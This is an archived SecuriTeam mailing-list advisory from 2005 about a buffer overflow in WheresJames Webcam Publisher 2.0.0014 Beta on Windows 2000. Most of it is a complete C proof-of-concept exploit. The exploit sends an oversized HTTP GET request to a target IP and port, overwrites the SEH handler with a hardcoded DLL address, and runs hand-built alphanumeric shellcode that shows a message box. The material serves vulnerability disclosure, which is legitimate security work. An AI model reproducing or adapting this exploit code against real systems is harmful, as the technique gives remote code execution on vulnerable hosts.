[EXPL] Webcam Publisher Buffer Overflow (Exploit)

• Previous message: SecuriTeam: "[NT] McAfee Internet Security Suite Race Condition Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 19 Apr 2005 11:18:38 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Webcam Publisher Buffer Overflow (Exploit)
------------------------------------------------------------------------

SUMMARY

 <http://www.wheresjames.com> WheresJames Webcam Publisher is software for
webcam online publishing - "WheresJames Webcam Publisher makes it easy for
you to publish images to the web. Overlay text of any font, color, size,
and position. Images, watermarks, time date stamps, and more."

WheresJames Webcam Publisher is vulnerable to a buffer overflow, the
following exploit will open MessageBox on a remote vulnerable system.

DETAILS

Vulnerable Systems:
 * WheresJames Webcam Publisher version 2.0.0014 Beta

Exploit:
/*
 * WheresJames Webcam Publisher Beta 2.0.0014 POC (www.wheresjames.com)
 *
 *
 * Bug and Exploit by : Miguel Tarasc Acu a - Haxorcitos.com 2005
 * Tarako AT gmail.com - Tarako AT Haxorcitos.com
 *
 * Platforms tested:
 *
 * - Windows 2000 SP4 Spanish
 * - Probably All Windows 2000 versions
 *
 *
 * Exploit Date: 15/April/2005
 *
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 * Greetings to: #haxorcitos, #dsr and #localhost @efnet
 *
 *
 * Little Explanation:
 *
 * Buffer must only have bytes between 0x20 and 0x7A, this limits you to
use
 * a generic shellcode.
 * I created a harcoded MessageBoxA alphanumeric Shellcode to run with
this POC
 * Also the offset referenced by the Call ECX SEH handler overwriten, must
contain
 * only bytes between 0x20 and 0x7A
 *
 * 77F69B9F 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18]
 * 77F69BA2 FFD1 CALL ECX
 *
 * stack
 * 00000000
 * 00000000
 * XXXXXXXX <-- EBX points to HERE (XX >= 0x20 && XX <= 0x7A)
 * YYYYYYYY <-- This DWORD overwrites the SEH handler (the flow is taken
in the CALL ECX)
 * 00000000
 * 00000000
 *
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

#define TIMEOUT 1
#define TOPHEADER "GET "
#define MIDDLEHEADER "\nHost: "
#define BOTTOMHEADER "\nUser-Agent: User-Agent: Haxorcitos/1.0
(compatible; MSIE 6.0; Windows NT 5.0)\n\
Accept: */*\n\
Accept-Language: es\n\
Accept-Encoding: gzip,deflate\n\
Keep-Alive: 100\n\
Connection: keep-alive\r\n\r\n"
#define BUFFERLEN 5000

char shellcode[] = // little harcoded alphanumeric "shellcode"
// haaaaX5aaaaP[H-,F3T--F3U5!@z!ShkitohTaraTZSSRSSP
 "\x68\x61\x61\x61\x61" // PUSH 61616161 ;
 "\x58" // POP EAX ; EAX = 61616161
 "\x35\x61\x61\x61\x61" // XOR EAX,61616161 ; EAX = 00000000
 "\x50" // PUSH EAX ;
 "\x5B" // POP EBX ; EBX = 00000000
 "\x48" // DEC EAX ; EAX = FFFFFFFF
 "\x2D\x2C\x46\x33\x54" // SUB EAX,5433462C ; EAX = ABCCB9D3
 "\x2D\x2D\x46\x33\x55" // SUB EAX,5533462D ; EAX = 569973A6
 "\x35\x21\x40\x7A\x21" // XOR EAX,217A4021 ; EAX = 77E33387
USER32.MessageBoxA (Win2kSP4)
 "\x53" // PUSH EBX ;
 "\x68\x6B\x69\x74\x6F" // PUSH 6F74696B ; ASCII "kito"
 "\x68\x54\x61\x72\x61" // PUSH 61726154 ; ASCII "Tara"
 "\x54" // PUSH ESP ;
 "\x5A" // POP EDX ; ASCII "Tarakito"
 "\x53" // PUSH EBX ; 0
 "\x53" // PUSH EBX ; 0
 "\x52" // PUSH EDX ; Tarakito
 "\x53" // PUSH EBX ; 0
 "\x53" // PUSH EBX ; 0
 "\x50" // PUSH EAX ; MessageBoxA
 "\xC3"; // RETN

struct { char *name; long offset; } supported[] = {
   // 0x72712F5E (clbcatq.dll 2000.2.3511.0) -> 83C108 = ADD ECX,8 + FFD1
= CALL ECX
   {"Windows 2000 Pro SP4 Spanish", 0x72712F5E },
   {"Crash", 0x41414141 }
},VERSIONES;

/******************************************************************************/
void ShowHeader(int argc,char *argv[]) {
   int i;
   printf("\n WheresJames Webcam Publisher Beta 2.0.0014 Buffer Overflow
POC\n");
   printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n");
 
   printf("\n Windows Versions:\n");
   printf(" ---------------------------------------------\n");
   for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) {
      printf(" %d) %s
(0x%08x)\n",i,supported[i].name,supported[i].offset);
   }
   printf(" ---------------------------------------------\n\n");
   if (argc<4) {
      printf(" Usage: %s <IP> <Port> <Option>\n",argv[0]);
      exit(1);
      exit(1);
   }
}
/******************************************************************************/

void main(int argc, char *argv[]) {
   SOCKET s;
   
   WSADATA HWSAdata;
   struct sockaddr_in sa;

   char *buffer=NULL;

   ShowHeader(argc,argv);

   if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
      printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError());
      exit(1);
   }

   if
((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
      printf("\n [e] Error: socket():%d\n", WSAGetLastError());
      exit(1);
   }

   sa.sin_family = AF_INET;
   sa.sin_port = (USHORT)htons(atoi(argv[2]));
   sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);

   if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR )
{
      printf("\n [e] Error: connect()");
      exit(1);
   }

   printf(" [i] Connected : Yes\n");
   printf(" [i] Target : %s\n",supported[atoi(argv[3])].name);

   
buffer=(char*)malloc(strlen(TOPHEADER)+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+1
      +strlen(argv[2])+strlen(BOTTOMHEADER)+1);
   memset(buffer,0,sizeof(buffer));

   memcpy(buffer,TOPHEADER,strlen(TOPHEADER));

   memset(buffer+strlen(TOPHEADER),'A',BUFFERLEN);

   
memcpy(buffer+strlen(TOPHEADER)+1052,&supported[atoi(argv[3])].offset,sizeof(long));

   memcpy(buffer+strlen(TOPHEADER)+1060,shellcode,strlen(shellcode));

   memcpy(buffer+BUFFERLEN,MIDDLEHEADER,strlen(MIDDLEHEADER));
   memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER),argv[1],strlen(argv[1]));
   
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1]),":",strlen(":"));
   memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+
      strlen(":"),argv[2],strlen(argv[2]));
   
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":")+
      strlen(argv[2]),BOTTOMHEADER,strlen(BOTTOMHEADER));

   send(s,buffer,strlen(buffer),0);

   printf(" [i] Buffer sent\n\n");

   closesocket(s);

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:tarako@gmail.com> Miguel
Tarasc Acua.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] McAfee Internet Security Suite Race Condition Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]